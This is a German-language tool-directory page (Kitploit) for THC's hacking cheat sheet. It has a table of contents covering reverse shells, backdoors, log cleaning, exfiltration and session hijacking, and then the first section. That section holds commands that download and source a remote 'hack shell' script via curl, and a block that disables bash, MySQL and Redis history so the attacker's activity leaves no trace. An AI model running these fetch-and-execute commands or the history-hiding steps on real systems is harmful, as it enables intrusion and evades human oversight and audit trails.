Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
thc-tips-tricks-hacks-cheat-sheet — Verschiedene Tipps & Tricks | Kitploit
Tools/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (Open-Source-Intelligence)PersistenzmechanismenLaterale BewegungDatenexfiltrationInformationsbeschaffungPost-ExploitationPenetrationstestsRed TeamingKuratierte Ressourcen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Payload-Entwicklung
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

Verschiedene Tipps & Tricks

Repository anzeigen
3.9k47149vor 3 MonatenVon Kitploit geprüft

THC's beliebteste Tipps, Tricks & Hacks (Spickzettel)

https://thc.org/tips

Eine Sammlung unserer Lieblingstricks. Viele dieser Tricks stammen nicht von uns. Wir sammeln sie lediglich.

Wir zeigen die Tricks 'wie sie sind' ohne jede Erklärung, warum sie funktionieren. Du musst Linux kennen, um zu verstehen, wie und warum sie funktionieren.

Hast du Tricks? Mach mit bei uns https://thc.org/ops

  1. Bash
    1. Richte eine Hack-Shell ein
    2. Verstecke deine Befehle
    3. Verstecke deine Befehlszeilenoptionen
    4. Verstecke eine Netzwerkverbindung
    5. Verstecke einen Prozess als Benutzer
    6. Verstecke einen Prozess als root
    7. Verstecke Skripte
    8. Verstecke vor cat
    9. Parallel ausführen mit separaten Logdateien
  2. SSH
    1. Fast unsichtbares SSH
    2. Mehrere Shells über eine SSH/TCP-Verbindung
    3. SSH-Tunnel
    4. SSH-Socks5-Tunnel
    5. SSH zu einem NATed Host
    6. SSH-Pivot via ProxyJump
    7. SSHD als Benutzer
  3. Netzwerk
    1. Hosts entdecken
    2. Tcpdump
    3. Tunnel und Weiterleitung
      1. Raw-TCP-Reverse-Ports
      2. HTTPS-Reverse-Forwards
      3. Verkehr mit iptables weiterleiten
      4. Ghost-IP / IP-Spoofing
      5. Verschiedenes
    4. Beliebiges Tool über Socks-Proxy nutzen
    5. Finde deine öffentliche IP-Adresse
    6. Erreichbarkeit aus der ganzen Welt prüfen
    7. Offene Ports prüfen/scannen
    8. Passwort-Hashes knacken
    9. Passwörter / Schlüssel brute-forcen
  4. Daten hoch-/runterladen/Exfiltration
    1. Datei-Encoding/Decoding
    2. Dateiübertragung per Ausschneiden & Einfügen
    3. Dateiübertragung mit tmux
    4. Dateiübertragung mit screen
    5. Dateiübertragung mit gs-netcat und sftp
    6. Dateiübertragung per HTTP
    7. Dateidownload ohne curl
    8. Dateiübertragung mit rsync
    9. Dateiübertragung zu öffentlichen Dump-Seiten
    10. Dateiübertragung per WebDAV
    11. Dateiübertragung zu Telegram
  5. Reverse Shell / Dumb Shell
    1. Reverse Shells
      1. mit gs-netcat (verschlüsselt)
      2. mit Bash
      3. mit cURL (verschlüsselt)
      4. mit cURL (Klartext)
      5. mit OpenSSL (verschlüsselt)
      6. mit remote.moe (verschlüsselt)
      7. ohne /dev/tcp
      8. mit Python
      9. mit Perl
      10. mit PHP
    2. Die Dumb Shell upgraden
      1. Reverse Shell zu einer pty-Shell upgraden
      2. Reverse Shell zu einer voll interaktiven Shell upgraden
      3. Reverse Shell mit socat (voll interaktiv)
  6. Backdoors
    1. gs-netcat
    2. sshx.io
    3. Kleinster SSHD-Backdoor
    4. Remote-Zugriff auf ein ganzes Netzwerk
    5. Kleinster PHP-Backdoor
    6. Kleinster Reverse-DNS-Tunnel-Backdoor
    7. Lokaler Root-Backdoor
    8. Selbstextrahierender Implant
  7. Host-Recon
  8. Shell-Hacks
    1. Dateien shreddern (sicheres Löschen)
    2. Das Datum einer Datei wiederherstellen
    3. Logdatei bereinigen
    4. Dateien vor einem Benutzer ohne root-Rechte verstecken
    5. Eine Datei unveränderbar machen
    6. Benutzer wechseln ohne sudo/su
    7. Payload verschleiern und verschlüsseln
    8. Backdoor ausrollen, ohne das Dateisystem zu berühren
  9. Krypto
    1. Schnelles zufälliges Passwort generieren
    2. Transportierbare verschlüsselte Linux-Dateisysteme
      1. cryptsetup
      2. EncFS
    3. Eine Datei verschlüsseln
  10. Session-Sniffing und -Hijacking
    1. Die SHELL-Sitzung eines Benutzers sniffern
    2. Alle SHELL-Sitzungen mit dtrace sniffern
    3. Alle SHELL-Sitzungen mit eBPF sniffern
    4. Die SSH- oder SSHD-Sitzung eines Benutzers mit strace sniffern
    5. Die ausgehende SSH-Sitzung eines Benutzers mit einem Wrapper-Skript sniffern
    6. Die ausgehende SSH-Sitzung eines Benutzers mit SSH-IT sniffern
    7. Eine laufende SSH-Sitzung hijacken / übernehmen
  11. VPN und Shells
    1. Wegwerf-Root-Server
    2. VPN/VPS-Anbieter
  12. OSINT-Intelligence-Gathering
  13. Sonstiges
    1. Werkzeuge des Handwerks
    2. Coole Linux-Befehle
    3. tmux-Spickzettel
    4. Nützliche Befehle
  14. Wie man ein Hacker wird
  15. Andere Seiten

1. Bash / Shell

1.i. Richte eine Hack-Shell (bash) ein:

Mache BASH weniger laut. Deaktiviert ~/.bash_history und viele andere Dinge.```sh source <(curl -SsfL https://thc.org/hs)

Alternative URL:```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

Und wenn es kein curl/wget gibt, verwende surl und (temporär) installiertes curl mit bin curl.```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

HackShell kann viel mehr, aber am wichtigsten ist Folgendes:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"

TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160

Wir verwenden anew häufig, und das ist eine schnelle Problemumgehung:```shell xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; } which anew &>/dev/null || alias anew=xanew

Bonus-Tipp:
Jeder Befehl, der mit einem " " (Leerzeichen) beginnt, wird ebenfalls [nicht im Verlauf gespeichert](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces).```
$  id

1.ii. Befehl verstecken / Befehl daemonisieren

Tool herunterladen